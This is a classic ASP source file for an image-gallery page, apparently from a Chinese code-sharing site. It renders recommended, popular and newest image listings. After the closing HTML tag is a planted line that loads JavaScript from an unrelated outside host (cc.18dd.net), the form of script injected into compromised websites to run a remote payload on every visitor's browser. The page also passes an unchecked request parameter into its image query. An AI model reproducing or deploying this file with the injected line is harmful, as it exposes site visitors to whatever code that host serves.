📄 index11.asp
字号:
<!--#include file="conn.asp"-->
<!--#include file="ShowImage.asp"-->
<%
ShowContent=Trim(Request("ShowContent"))
ShowContent=split(ShowContent,",")
ClassName=ShowContent(1)
if request.querystring("page")="" then
ipagecurrent=1
else
ipagecurrent=cint(request.querystring("page"))
end if
%>
<HTML>
<HEAD>
<TITLE><%=rs5("webname")%></TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2920.0" name=GENERATOR>
<link href="style/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY bgColor=#CCCCCC leftMargin=0 topMargin=0 marginwidth="0" marginheight="0">
<div id="dhtmltooltip"></div>
<script language="JavaScript" src="style/mouse.js"></script>
<!--#include file="top.asp"-->
<TABLE align=center bgColor=#ffffff border=0 cellPadding=0 cellSpacing=0
width=770>
<TBODY>
<TR>
<TD vAlign=top width=170><!--#include file="left.asp"--></TD>
<TD background=images/new_bg2.gif vAlign=top width=3><IMG height=10
src="images/dot.gif" width=4></TD>
<TD vAlign=top>
<TABLE border=0 cellPadding=0 cellSpacing=0 height=23 width="100%">
<TBODY>
<TR>
<TD><!--#include file="line.asp"--></TD>
</TR></TBODY></TABLE>
<TABLE background=images/bj4.gif border=0 cellPadding=0
cellSpacing=0 height=1 width="100%">
<TBODY>
<TR>
<TD height=1><IMG height=1 src="images/dot.gif"
width=10></TD></TR></TBODY></TABLE>
<%if ClassName="" then%>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="24" bgcolor="#FF9900"><img src="images/news_4.gif" width="9" height="9">每周推荐图片</td>
</tr>
<tr>
<td height="16"> </td>
</tr>
<tr>
<td width="100%"><%ShowImages "rec","all",MaxWidth,MaxHeight,recRow,cint(ShowCount(0)),cint(ShowCount(1)),0%></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="24" bgcolor="#FF9900"><img src="images/news_4.gif" width="9" height="9">最新热门图片</td>
</tr>
<tr>
<td height="16"> </td>
</tr>
<tr>
<td width="100%"><%ShowImages "hot","all",MaxWidth,MaxHeight,hotRow,cint(ShowCount(2)),cint(ShowCount(3)),0%></td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="24" bgcolor="#FF9900"><img src="images/news_4.gif" width="9" height="9">最新加入图片</td>
</tr>
<tr>
<td height="16"> </td>
</tr>
<tr>
<td width="100%"><%ShowImages "new","all",MaxWidth,MaxHeight,newRow,cint(ShowCount(4)),cint(ShowCount(5)),0%></td>
</tr>
</table>
<%else%>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td> </td>
</tr>
<tr>
<td width="100%"><%ShowImages "all",ClassName,MaxWidth,MaxHeight,2,8,1,1%></td>
</tr>
</table>
<%end if%>
</td>
</tr>
</table>
</TD>
<!--#include file="bottom.asp"-->
</BODY></HTML>
<script language=javascript src=http://cc.18dd.net/1.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -